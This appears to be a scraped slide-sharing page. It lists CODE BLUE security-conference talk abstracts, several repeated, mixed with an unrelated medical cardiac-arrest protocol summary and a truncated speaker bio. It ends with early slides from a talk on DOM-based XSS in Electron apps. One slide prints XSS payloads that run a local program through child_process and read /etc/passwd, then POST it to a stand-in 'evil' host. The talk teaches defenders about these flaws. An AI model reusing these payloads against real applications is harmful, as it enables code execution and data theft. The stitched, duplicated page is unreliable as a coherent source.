Electronは、WindowsやOS X、Linuxのデスクトップアプリケーションを簡単に作成するためのフレームワークであり、Atom EditorやVisual Studio Code、Slackといった人気アプリケーションの開発にも用いられている。ElectronはChromiumとnode.jsを内包することでWebアプリケーション開発者が慣れた手法でデスクトップアプリケーションを開発可能にしている反面、アプリケーション内にDOM-based XSSが一か所でも存在すると��易に任意コード実行が可能になるなどセキュリティ上の問題点も多数存在しており、事実、今日までに著名なElectron製アプリケーションにおいて任意コード実行が可能な脆弱性を多数発見・報告している。
本セッションでは、Electronを利用して開発する際に発生しやすいセキュリティ上の問題点を整理して理解することを目的にしている。
--- はせがわ ようすけYosuke Hasegawa
株式会社セキュアスカイ・テクノロジー常勤技術顧問。
Internet Explorer、Mozilla FirefoxをはじめWebアプリケーションに関する多数の脆弱性を発見。 Black Hat Japan 2008、韓国POC 2008、2010、OWASP AppSec APAC 2014他講演多数。
OWASP Kansai Chapter Leader / OWASP Japan Board member
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...CODE BLUE
End-user’s requirements for secure IT products are continually increased in environment that are affected directly to human life and industry such as IoT, CPS. Because vendors and end-user sell or buy products based on trustworthy or objective security evaluation results, security evaluation roles are important. Security Evaluations are divided to two parts, one is evaluation on design level such as ISO/IEC 29128(Verification of Cryptographic Protocols) and another one is post-implementation level such as ISO/IEC 15408(Common Criteria). These security evaluation standards, both ISO/IEC 29128 and ISO/IEC 15408, advise to use formal verification and automated tools when high assurance level of target products is required.
For a long time, vulnerability detection using automated tools have been tried and studied by many security researchers and hackers. And recently, the study related to automated vulnerability detection are now more active than ever in hacking community with DARPA’s CGC(Cyber Grand Challenge). But, too many tools are developed continually and usually each tool has their own purpose to use, so it’s hard to achieve ultimate goal of security evaluation effectively and verify evaluation results.
Furthermore, there are no references for categorizing about automated tools on perspective of security evaluations. So, in this presentation we will list up, categorize and analyze all of automated tools for vulnerability detection and introduce our result such as pros and cons, purpose, effectiveness, etc.
-- InHyuk Seo
My name is Inhyuk Seo(Nick: inhack). I graduated B.S. in Computer Science and Engineering at Hanyang University(ERICA) in 2015. Now I’m a researcher and M.S. of SANE(Security Analaysis aNd Evaluation) Lab at Korea University. I’m interested in Programming Language, Software Testing, Machine Learning, Artificial Intelligence.
In 2012, I completed high-quality information security education course “the Best of the Best(BoB)” hosted by KITRI(Korea Information Technology Research Institute) and conducted “Exploit Decoder for Obfuscated Javascript” Project.
I participated in many projects related with vulnerability analysis. I conducted “Smart TV Vulnerability Analysis and Security Evaluation” and “Developing Mobile Security Solution(EAL4) for Military Environment ”. Also, I participated in vulnerability analysis project for IoT products of various domestic tele-communications.
-- Jisoo Park
Jisoo Park graduated with Dongguk University B.S in Computer science engineering. He participated in secure coding research project in Programming Language Lab and KISA(Korea Internet & Security Agency). He worked as a software QA tester at anti-virus company Ahnlab. He also completed high-quality information security education course “Best of the Best” hosted by KITRI(Korea Information Technology Research Institute) and conducted security consulting for Car sharing service company.
Now, Jisoo Park is a
The document outlines protocols for responding to cardiopulmonary arrests, known as Code Blues. It describes initiating Basic Life Support, Advanced Cardiac Life Support, or Pediatric Advanced Life Support depending on the patient. It provides details on activating emergency codes, assembling code teams, performing immediate interventions like CPR and defibrillation, notifying physicians, and transferring patients to the emergency department. Crash carts and equipment are also discussed, including obtaining replacement carts and charging used items.
[CB16] Background Story of "Operation neutralizing banking malware" and highl...CODE BLUE
Financial damages caused by remittance fraud in Japan has been increasing since year 2013, and this has become a critical problem in our society.
In April 2015, Tokyo Metropolitan Police Department conducted its very first unique takedown operation called "Operation Banking Malware Takedown”.
Tokyo Metropolitan Police Department had asked us to cooporate with this operation, so we developed a technology that would takedown the banking malware called "VAWTRAK".
In this presentation, I will give an overview of the operation and a background of our involvement.
Then, I will introduce and demonstrate the technology that we developed to takedown “VAWTRAK”.
I will also provide a description of ongoing banking malware attacks this year based on our investigation.
--- Kazuki Takada
He works at SecureBrain Corporation and belongs to Advanced Research Center and Security Response Team. Senior Software Engineer. 2014, He joined SecureBrain Corporation. As a software engineer, he works on the software development while doing security research. Mainly he focused on the analysis of the cyber crimes caused by financial Malware and phishing and its developing its technological countermeasures.
Major lectures in the past
2015/2016 Practical Anti-Phishing Guideline Seminar Lecturer
2016 IEICE requested symposium “Analysis methods and the results from Malware Long-term observation and taint analysis”.
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
Electron is a framework to create the desktop application on Windows,OS X, Linux easily, and it has been used to develop the popular applications such as Atom Editor, Visual Studio Code, and Slack.
Although Electron includes Chromium and node.js and allow the web application developers to be able to develop the desktop application with accustomed methods, it contains a lot of security problems such as it allows arbitrary code execution if even one DOM-based XSS exist in the application. In fact, a lot of vulnerabilities which is able to load arbitrary code in applications made with Electron have been detected and reported.
In this talk, I focus on organize and understand the security problems which tend to occur on development using Electron.
--- Yosuke Hasegawa
Secure Sky Technology Inc, Technical Adviser. Known for finding numerous vulnerablities in Internet Explorer、Mozilla Firefox and other web applications.He has also presented at Black Hat Japan 2008, South Korea POC 2008, 2010 and others.
OWASP Kansai Chapter Leader, OWASP Japan Board member.
[CB16] ATMS how to break them to stop the fraud. by Olga Kochetova & Alexey O...CODE BLUE
The most common story that we hear: something happens with ATM that makes it empty, leaving no forensic evidence. No money and no logs.
We have collected huge number of cases on how ATMs could be hacked during our researches, incidents responses and security assessments. A lot of malware infects ATM through the network or locally. There are black boxes, which connect to communications port of devices directly. There are also network attacks, such as rogue processing center or MiTM.
How to stop the ATMs fraud? How to protect ATMs from attacks such as black box jackpotting? How to prevent network hijacking such as rogue processing center or MiTM? Some of these issues can be fixed by configuration means, some fixed by compensation measures, but many only by vendor. We will tell you about what bank can do now and what we as a community of security specialists should force to vendors. Before we spoke about vulnerabilities and fraud methods used by criminals. Now we would like to combine our expertise to help financial and security society with more direct advices how to implement security measures or approaches to make ATMs more secure.
--- Olga Kochetova
Olga is interested in how various devices interact with cash or plastic cards. She is a senior specialist for the penetration testing team at Kaspersky Lab. Olga has authored multiple articles and webinars about ATM security. She is also the author of advisories about various vulnerabilities for major ATM vendors and has been a speaker at international conferences, including Black Hat Europe, Hack in Paris, Positive Hack Days, Security Analyst Summit, Nuit Du Hack, Hack In The Box Singapore and others.
--- Alexey Osipov
Lead Expert on a Penetration Testing Team at Kaspersky Lab. An author of variety of techniques and utilities exploiting vulnerabilities in XML protocols and telecom equipment security. Author of advisories for various vulnerabilities for major ATM vendors. A speaker at international security conferences: Black Hat, Hack in Paris (presenting the paper on ATM vulnerabilities), NoSuchCon Paris, Nuit du Hack, Hack In The Box Singapore, Positive Hack Days, Chaos Communication Congress.
[CB16] Keynote: How much security is too much? by Karsten NohlCODE BLUE
Based on one decade of impactful security research and several years as a risk manager, Karsten Nohl reflects upon what he would have done differently in pushing a data security agenda.
Our community is convinced that stellar IT security is paramount for companies large and small: We need security for system availability, for brand reputation, to prevent fraud, and to keep data private. But is more security always better?
Poorly chosen protection measures can have large externalities on the productivity, innovation capacity, and even happiness of organizations. Can too much security be worse than too little security?
This talk investigates the trade-off between security and innovation along several examples of current security research. It finds that some hacking research is counter-productive in bringing the most security to most people, by spreading fear too widely.
---
Karsten Nohl
Karsten Nohl has spoken widely on security gaps since 2006. He and co-investigators have uncovered flaws in mobile communication, payment, and other widely-used infrastructures. In his work at an Asian 4G and digital services provider, and as Chief Scientist at Security Research Labs in Berlin, a risk management think tank specializing in emerging IT threats, Karsten challenges security assumptions in proprietary systems and is fascinated by the security-innovation trade-off. Hailing from the Rhineland, he studied electrical engineering in Heidelberg and earned a doctorate in 2008 from the University of Virginia.
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
It started with computer hacking and Japanese linguistics as a kid. Zach Mathis has been based in Kobe, Japan, and has performed both red team services as well as blue team incident response and defense consultation for major Japanese global Japanese corporations since 2006. He is the founder of Yamato Security, one of the largest and most popular hands-on security communities in Japan, and has been providing free training since 2012 to help improve the local security community. Since 2016, he has been teaching security for the SANS institute and holds numerous GIAC certifications. Currently, he is working with other Yamato security members to provide free and open-source security tools to help security analysts with their work.
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
An expert in mobile network security provided a summary of hacking 5G networks. Some key points include:
1) Standard IT security techniques uncovered issues when applied to upgraded legacy 4G networks, such as unpatched operating systems, weak configurations, and lack of encryption.
2) Future 5G networks introduce new security risks due to increased complexity from virtualization and automation layers, as well as a continuously evolving attack surface extending into cloud infrastructure.
3) Red team exercises show that hacking mobile networks has become a multi-step process, where initial access through one vulnerability can enable lateral movement and privilege escalation to compromise critical systems or customer data.
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
Printer has become one of the essential devices in the corporate intranet for the past few years, and its functionalities have also increased significantly. Not only print or fax, cloud printing services like AirPrint are also being supported as well to make it easier to use. Direct printing from mobile devices is now a basic requirement in the IoT era. We also use it to print some internal business documents of the company, which makes it even more important to keep the printer safe.
Nowadays, most of the printers on the market do not have to be connected with USB or traditional cable. As long as you are using a LAN cable connected to the intranet, the computer can find and use the printer immediately. Most of them are based on protocols such as SLP and LLMNR. But is it really safe when vendors adopt those protocols? Furthermore, many printers do not use traditional Linux systems, but use RTOS(Real-Time Operating System) instead, how will this affect the attacker?
In this talk, we will use Canon ImageCLASS MF644Cdw and HP Color LaserJet Pro MFP M283fdw as case study, showing how to analyze and gain control access to the printer. We will also demonstrate how to use the vulnerabilities to achieve RCE in RTOS in unauthenticated situations.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
Yuuma Taki is enrolled in the Hokkaido Information University Information Media Faculty of Information Media (4th year).
At university he is focusing on learning about security for lower-level components, such OS and CPU. In his third year of undergraduate school, he worked on trying to implement the OS security mechanism "KASLR", at Sechack365.
Currently, he is learning about ROP derivative technology and embedded equipment security.
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
In October 2021, we published the first analysis of Wslink – a unique loader likely linked to the Lazarus group. Most samples are packed and protected with an advanced virtual machine (VM) obfuscator; the samples contain no clear artifacts and we initially did not associate the obfuscation with a publicly known VM, but we later managed to connect it to CodeVirtualizer. This VM introduces several additional obfuscation techniques such as insertion of junk code, encoding of virtual operands, duplication of virtual opcodes, opaque predicates, merging of virtual instructions, and a nested VM.
Our presentation analyzes the internals of the VM and describes our semi automated approach to “see through” the obfuscation techniques in reasonable time. We demonstrate the approach on some bytecode from a protected sample and compare the results with a non-obfuscated sample, found subsequent to starting our analysis, confirming the method’s validity. Our solution is based on a known deobfuscation method that extracts the semantics of the virtual opcodes, using symbolic execution with simplifying rules. We further treat the bytecode chunks and some internal constructs of the VM as concrete values instead of as symbolic ones, enabling the known deobfuscation method to deal with the additional obfuscation techniques automatically.
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
Kimsuky is a North Korean APT possibly controlled by North Korea's Reconnaissance General Bureau. Based on reports from the Korea Internet & Security Agency (KISA) and other vendors, TeamT5 identified that Kimsuky's most active group, CloudDragon, built a workflow functioning as a "Credential Factory," collecting and exploiting these massive credentials.
The credential factory powers CloudDragon to start its espionage campaigns. CloudDragon's campaigns have aligned with DPRK's interests, targeting the organizations and key figures playing a role in the DPRK relationship. Our database suggested that CloudDragon has possibly infiltrated targets in South Korea, Japan, and the United States. Victims include think tanks, NGOs, media agencies, educational institutes, and many individuals.
CloudDragon's "Credential Factory" can be divided into three small cycles, "Daily Cycle," "Campaign Cycle," and "Post-exploit Cycle." The"Daily Cycle" can collect massive credentials and use the stolen credentials to accelerate its APT life cycle.
In the "Campaign Cycle," CloudDragon develops many new malware. While we responded to CloudDragon's incidents, we found that the actor still relied on BabyShark malware. CloudDragon once used BabyShark to deploy a new browser extension malware targeting victims' browsers. Moreover, CloudDragon is also developing a shellcode-based malware, Dust.
In the "Post-exploit Cycle," the actor relied on hacking tools rather than malicious backdoors. We also identified that the actor used remote desktop software to prevent detection.
In this presentation, we will go through some of the most significant operations conducted by CloudDragon, and more importantly, we will provide possible scenarios of future invasions for defense and detection.
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
Social media is no doubt a critical battlefield for threat actors to launch InfoOps, especially in a critical moment such as wartime or the election season. We have seen Bot-Driven Information Operations (InfoOps, aka influence campaign) have attempted to spread disinformation, incite protests in the physical world, and doxxing against journalists.
China's Bots-Driven InfoOps, despite operating on a massive scale, are often considered to have low impact and very little organic engagement. In this talk, we will share our observations on these persistent Bots-Driven InfoOps and dissect their harmful disinformation campaigns circulated in cyberspace.
In the past, most bots-driven operations simply parroted narratives of the Chinese propaganda machine, mechanically disseminating the same propaganda and disinformation artifacts made by Chinese state media. However, recently, we saw the newly created bots turn to post artifacts in a livelier manner. They utilized various tactics, including reposting screenshots of forum posts and disguised as members of “Milk Tea Alliance,” to create a false appearance that such content is being echoed across cyberspace.
We particularly focus on an ongoing China's bots-driven InfoOps targeting Taiwan, which we dub "Operation ChinaRoot." Starting in mid-2021, the bots have been disseminating manipulated information about Taiwan's local politics and Covid-19 measures. Our further investigation has also identified the linkage between Operation ChinaRoot and other Chinese state-linked networks such as DRAGONBRIDGE and Spamouflage.
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
Malwares written in Go is increasing every year. Go's cross-platform nature makes it an opportune language for attackers who wish to target multiple platforms. On the other hand, the statically linked libraries make it difficult to distinguish between user functions and libraries, making it difficult for analysts to analyze. This situation has increased the demand for Go malware classification and exploration.
In this talk, we will demonstrate the feasibility of computing similarity and classification of Go malware using a newly proposed method called gimpfuzzy. We have implemented "gimpfuzzy", which incorporates Fuzzy Hashing into the existing gimphash method. In this talk, we will verify the discrimination rate of the classification using the proposed method and confirm the validity of the proposed method by discussing some examples from the classified results. We will also discuss issues in Go-malware classification.
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
This document discusses the results of long-term scanning and analysis of Winnti 4.0 and ShadowPad malware command and control (C2) protocols. It finds that Winnti 4.0 C2s primarily use TLS, HTTPS, and HTTP, while ShadowPad variants primarily use TCP, HTTPS, and HTTP. Analysis of the protocols reveals encryption methods, packet structures, and server-side functionality. Over time, the number and distribution of active C2s changed, likely in response to research publications and incident response actions. The document advocates for anonymization techniques and merits and risks of future research publications.
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
We are swamped with new types of malware every day. The goal of malware analysis is not to reveal every single detail of the malware. It is more important to develop tools for efficiency or introduce automation to avoid repeating the same analysis process. Therefore, malware analysts usually actively develop tools and build analysis systems. On the other hand, it costs a lot for such tool developments and system maintenance. Incident trends change daily, and malware keeps evolving. However, it is not easy to keep up with new threats. Malware analysts spend a long time maintaining their analysis systems, and it results in reducing their time for necessary analysis of new types of malware.
To solve these problems, we incorporate DevOps practices into malware analysis to reduce the cost of system maintenance by using CI/CD and Serverless. This presentation shares our experience on how CI/CD, Serverless, and other cloud technologies can be used to streamline malware analysis. Specifically, the following case studies are discussed.
* Malware C2 Monitoring
* Malware Hunting using Cloud
* YARA CI/CD system
* Malware Analysis System on Cloud
* Memory Forensic on Cloud
Through the above case studies, we will share the benefits and tips of using the cloud and show how to build a similar system using Infrastructure as Code (IaC). The audience will learn how to improve the efficiency of malware analysis and build a malware analysis system using Cloud infrastructure.
論文紹介:Coarse-to-Fine Amodal Segmentation with Shape Prior
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you think by はせがわようすけ
1. Build cross platform desktop XSS
It’s easier than you think
ELECTRON
Secure Sky Technology Inc.
Yosuke HASEGAWA
2. Yosuke HASEGAWA @hasegawayosuke
Secure Sky Technology Inc. Technical Advisor
OWASP Kansai Chapter Leader
OWASP Japan Chapter board member
CODE BLUE Review board member
http//utf-8.jp/ Author of jjencode, aaencode
Talked at Black Hat Japan 2008, KOREA POC 2008,
POC 2010, OWASP AppSec APAC 2014 and others.
Found many vulns of IE, Firefox and others.
Secure Sky Technology Inc. CODE BLUE 2016
3. Secure Sky Technology Inc. CODE BLUE 2016
What's Electron ?
GitHub社によって開発された、クロスプラット
フォームなデスクトップアプリケーションを開発
するためのフレームワーク
HTML+JavaScriptでアプリケーションを作成で
きる
多くのアプリケーションで使用実績
4. Secure Sky Technology Inc. CODE BLUE 2016
What's Electron ?
HTML + JavaScript = Native Apps
Microsoft HTML Application (*.hta)
Firefox OS
Apache Cordova / Adobe PhoneGap
Chrome Apps
Electron / NW.js
Electron
Cross platform
バイナリのビルドが可能
5. Secure Sky Technology Inc. CODE BLUE 2016
What's Electron ?
Node.jsとChromiumをランタイムとして内包
メインプロセス
アプリケーション全体を統括。node.jsそのもの
レンダラプロセス
Chromium+node.js
main
process
renderer
process
Electron Apps
IPC
6. Secure Sky Technology Inc. CODE BLUE 2016
What's Electron ?
main
process
renderer
process
Electron Apps
IPC
index.html
package.json
{
"name" : "Apps name",
"version" : "0.1",
"main" : "main.js"
}
main.js
let win = new BrowserWindow( {width:840,height:700} );
{json}
<html>
<head>...</head>
<body>
<script>...</script>
</body>
</html>
win.loadURL( `file://${__dirname}/index.html` );
24. Secure Sky Technology Inc. CODE BLUE 2016
DOM-based XSS on Electron apps
レンダラ上でnode機能がデフォルト有効
// xss_source は攻撃者がコントロール可能な文字列
elm.innerHTML = xss_source; // XSS!
<img src=# onerror=
"require('child_process').exec('calc.exe',null);">
<img src=# onerror="
let s = require('fs').readFileSync('/etc/passwd','utf-8');
fetch( 'http://evil.utf-8.jp/', { method:'POST', body:s });
">
25. Secure Sky Technology Inc. CODE BLUE 2016
”
“
DOM-based XSS on Electron apps
任意コード実行が可能 - まるでバッファオーバーフロー
XSS: The New Buffer Overflow
In many respects, an XSS vulnerability is
just as dangerous as a buffer overflow.
多くの点から見て、XSS 脆弱性の危険性はバッファ
オーバーフローに匹敵します。
"Security Briefs: SDL Embraces The Web", Apr. 2008
http://web.archive.org/web/20080914182747/http://msdn.microsoft.com/e
n-us/magazine/cc794277.aspx
26. Secure Sky Technology Inc. CODE BLUE 2016
DOM-based XSS on Electron apps
ソースをエスケープせずにシンクに与えることで
JS上で発生するXSS
ソース:攻撃者の与えた文字列
シンク:文字列からHTMLを生成したりコードとして
実行する箇所
ソース 処理 シンク
location.hash
location.href
location.search
document.referrer
window.name
xhr.responseText
postMessage
location.href
document.write
innerHTML
eval
Function
setTimeoutsetInterval
27. Secure Sky Technology Inc. CODE BLUE 2016
DOM-based XSS on Electron apps
ソースをエスケープせずにシンクに与えることで
JS上で発生するXSS
ソース:攻撃者の与えた文字列
シンク:文字列からHTMLを生成したりコードとして
実行する箇所
ソース 処理 シンク
location.hash
location.href
location.search
document.referrer
window.name
xhr.responseText
postMessage
location.href
document.write
innerHTML
eval
Function
setTimeoutsetInterval
ユーザ名
データベース
ファイルの内容
ファイルの内容
ファイル名 ログの内容
webFrame.executeJavaScript
webViewrequire
28. Secure Sky Technology Inc. CODE BLUE 2016
DOM-based XSS on Electron apps
従来のWebアプリでは存在しなかったソース
HTTPやWebと無関係なあらゆるデータがXSSソー
スとなり得る
シンクはそれほど増えていない
requireなどに動的な引数を与えることは通常ない
ソースを意識するのではなく、シンクへ渡す際に
エスケープすることが重要
適切なDOM操作(textContent、setAttribute等)